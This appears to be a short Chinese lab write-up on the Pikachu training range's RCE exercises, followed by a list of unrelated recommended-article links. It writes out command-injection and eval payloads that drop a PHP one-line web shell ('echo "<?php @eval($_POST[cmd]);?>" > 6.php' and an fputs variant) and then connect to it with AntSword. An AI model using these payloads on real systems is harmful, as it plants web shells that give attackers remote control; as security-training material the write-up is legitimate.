Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
路由侠内网穿透.2 分钟前
本地部署远程服务管理软件 IntelliSSH 并实现外部访问
运维·服务器·网络·网络协议
同聘云2 分钟前
阿里云国际站服务器防火墙怎么关闭?防火墙部署方式有哪些?
服务器·阿里云·云计算
TAEHENGV2 分钟前
隐私安全模块 Cordova 与 OpenHarmony 混合开发实战
安全
同聘云5 分钟前
阿里云国际站服务器独立ip有什么好处?独立ip怎么搭建?
服务器·安全·阿里云·云计算
帅那个帅5 分钟前
Kubectl 命令使用总结
运维·服务器·容器
钟智强6 分钟前
红队实战复盘:如何运用【火尖枪】高效突破复杂登录防线
服务器·安全·web安全·http·go·php·bruteforce
EasyCVR7 分钟前
视频汇聚平台EasyCVR筑牢智慧物流全场景可视化安全防线
大数据·安全·音视频
QQ帝国7 分钟前
Vue3 + Vite 项目使用 GitBash 自动化部署GitHub
运维·自动化
草莓熊Lotso8 分钟前
《算法闯关指南:递归,搜索与回溯算法--递归》--02. 合并两个有序链表,03. 反转链表
运维·数据结构·算法·链表
漫漫求11 分钟前
ubuntu设置软件开机自启动
linux·运维·ubuntu